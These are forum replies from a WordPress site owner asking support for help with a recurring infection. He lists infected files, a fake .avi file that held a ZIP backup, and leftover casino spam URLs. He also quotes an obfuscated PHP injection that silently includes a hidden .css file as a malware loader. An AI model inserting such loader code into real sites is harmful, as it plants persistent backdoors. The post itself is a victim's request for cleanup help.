lubos55
Forum Replies Created
-
Hello.
Something’s not working.
The audit log does not contain any activity related to file changes that were later identified by the scanner on 11/25 at 01:04 AM.
/home/html/hudbaaslovo.cz/public_html/wp-includes/load.php
/home/html/hudbaaslovo.cz/public_html/index.php
/home/html/hudbaaslovo.cz/public_html/wp-includes/blocks/post-featured-image/.42ce3e21.cssHow is that possible?
I managed to find the file edbabcd24d9f0a8d28cfbde8e011bbd3.avi, which did not contain a video, but a ZIP. The ZIP contained an older backup of the site with the infected files mentioned above.
The infection consisted of code injection and .css style placement.
Code:
/3516e/
$rcyul = “/ho\x6de/ht\x6dl/hudbaaslovo.cz/public_ht\x6dl/wp\x2dincludes/blocks/post\x2dfeatured\x2di\x6dage/.42ce3e21.css”; if (!isset($rcyul)) {md5 ($rcyul);} else { @include_once /* 81 / ($rcyul); } /3516e*/This code is just an example. The code varies with each change.
Deleting the .css and .avi files and removing some of the code from the .php files on 11/24 did not help, as the infection reappeared on the morning of 11/25.
Last night (24.11) I thought that the site was already clean and so I asked Eset to remove our site hudbaaslovo.cz from the blacklist. However, I got a negative answer because the site is still infected. I am attaching a detailed infection report:
https://sitecheck.sucuri.net/results/hudbaaslovo.czCan I rely on this document to update the Wordfence signatures and I will be able to clean the site with the support of your scan?
Thank you for your help
Luboš
I looked at the audit log for the last month and there is not a single event. Does that mean the hacker cleaned up after himself?
Luboš
I am not aware of any active redirects outside of hudbaaslovo.cz. However, I am aware of a problem related to another attack that took place at the end of August. At that time, our site was exploited for apparently illegal Casino related games. The site was cleaned by a specialized company. To this day, however, there are attempts to contact the defunct site.
Google Search Console shows me that we have 1,464 pages that are not indexed and have a status of (Not Found 404 )
Examples:
https://hudbaaslovo.cz/2024/08/21/guru-casino-bonus-bez-vkladu-50-free-spins/
https://hudbaaslovo.cz/2024/08/21/automaty-honey-honey-honey-online-zdarma/
https://hudbaaslovo.cz/2024/08/21/automaty-floating-dragon-hold-and-spin-online-zdarma/As for the redirects, it’s the same cause. Someone has saved a non-existent page in their bookmarks and is trying to contact the non-existent page. There are 44 of these cases. I have checked these pages individually to see if there are any active redirects left. The result of my check is that there are no redirects outside of hudbaaslovo.cz.
Examples:
https://hudbaaslovo.cz/?p=4165
https://hudbaaslovo.cz/?p=3770Thank you about advise
Luboš
Thanks for the advice. I applied some of them before I wrote this post. I also checked users and plugins. For plugins, I have a problem with the “Meta pixel for WordPress” plugin not being active. There could be a connection to the attack, but it can’t be uninstalled. Would you have any advice on how to get rid of this plugin? Can I cancel it via FTP access?
I am not able to search for suspicious files myself. I rely on Scan Wordfence and with its help I have been able to clean the site so far. I am surprised, however, that new findings of suspicious files appear after some time. In part, these are indeed new files in terms of Scan. My explanation is that these are new vulnerabilities that correspond to new signatures. However, I can’t explain that even files that I patched hours/days ago have been changed.
To explain. The numbers I have given in the text represent the date. For 7.11. (November 7) I forgot ‘.’.
Luboš